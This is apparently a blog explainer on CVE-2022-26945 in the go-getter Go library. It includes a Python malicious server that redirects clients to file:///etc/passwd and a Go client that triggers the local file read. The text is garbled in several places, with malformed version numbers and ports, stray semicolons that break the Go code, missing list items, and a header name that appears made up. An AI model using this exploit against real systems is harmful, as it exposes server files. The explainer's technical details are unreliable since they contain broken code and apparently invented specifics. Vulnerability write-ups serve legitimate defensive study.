CVE-2022-26945 - Go-Getter Protocol Switching and Redirect Flaws Explained (with Exploit and Fix)

CVE-2022-26945 is all about dangerous flaws in go-getter, a popular Golang library used to download files from URLs across various protocols like HTTP, S3, GCS, and even Git repos. This CVE affects versions up to 1.5.11 and 2..2 and allows attackers to:

Bypass configuration restrictions (such as only allowing certain sources)

These weaknesses happen because of the way go-getter handled custom HTTP response headers. In this guide, I'll walk you through exactly what went wrong, show you code for exploiting the vulnerabilities, then explain what's been fixed and how to stay safe.

What is Go-Getter?

Go-getter makes it easy for tools (like Terraform, Packer) to fetch data from multiple sources and protocols using a single interface, for example:

import "github.com/hashicorp/go-getter"

err := getter.Get(context.Background(), "./localfolder", "http://example.com/archive.zip";)

This will download the ZIP from the HTTP link into ./localfolder, automatically figuring out what to do.

1. Protocol Switching via Custom Headers

Go-getter trusted the X-Go-Getter-Redirect header set by an HTTP server. If the server responded with this header, go-getter would follow the value as a new URL—including switching protocols, such as from HTTP to FILE, or to an internal address.

Example

1. Go-getter requests http://attacker.com/resource.

`

HTTP/1.1 302 Found
X-Go-Getter-Redirect: file:///etc/passwd

`

3. Go-getter fetches /etc/passwd from local disk and returns it, exposing files if run on a server!

2. Endless Redirect Loops

An attacker can create a header that points back to itself or a chain of URLs, making go-getter loop endlessly, burning up resources.

3. Configuration Bypass

If an app wants to restrict downloads to http only, this can be bypassed. Even if the original URL is http://, the attacker can force go-getter to switch to S3, FILE, or any protocol that go-getter supports.

Malicious Server Code (Python)

from http.server import BaseHTTPRequestHandler, HTTPServer

class ExploitHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        # Redirect to a file:// URL
        self.send_header('X-Go-Getter-Redirect', 'file:///etc/passwd')
        self.end_headers()

httpd = HTTPServer(('...', 808), ExploitHandler)
print("Malicious HTTP server running on port 808")
httpd.serve_forever()

Vulnerable Go-Getter Usage

package main

import (
    "context"
    "fmt"
    "os"

    "github.com/hashicorp/go-getter"
)

func main() {
    err := getter.Get(context.Background(), "./output", "http://localhost:808/anything";)
    if err != nil {
        fmt.Fprintln(os.Stderr, "Download failed:", err)
    }
}

If you run this Go code while the Python server is running (on the same machine), it will fetch /etc/passwd and place it in ./output—even though you only gave it an HTTP URL!

Original References

- Hashicorp Security Advisory: https://discuss.hashicorp.com/t/hcsec-2022-17/42564
- GitHub Issue Ticket: https://github.com/hashicorp/go-getter/security/advisories/GHSA-6v5m-c6r3-7mfj
- CVE details on NVD: https://nvd.nist.gov/vuln/detail/CVE-2022-26945

There is strict checking of custom headers, and config settings are enforced even after redirection.

Patch diff: The crucial part was this commit (for example), which refactored protocol and source validation after handling headers.

What Should You Do?

- Check your dependencies! If you use go-getter via Terraform, Packer, or your own code, make sure you're using v1.6.1 or v2.1. or later.

If you can't update, never trust input URLs that might be attacker-controlled.

- If you run public services wrapping go-getter, restrict or validate the origin of supplied URLs before downloading.

Conclusion

CVE-2022-26945 shows how trusting HTTP headers, especially custom ones, can let attackers break through “safe” code paths—especially if a library supports many protocols. Always read changelogs for your dependencies and apply security patches quickly.

- If you want to dig in deeper, see the official HashiCorp advisory.

You can play with the bug safely using the code snippets above.

- Upgrade go-getter now and check any application that calls out to arbitrary or user-supplied URLs!

Timeline

Published on: 05/25/2022 12:15:00 UTC
Last modified on: 08/10/2022 22:25:00 UTC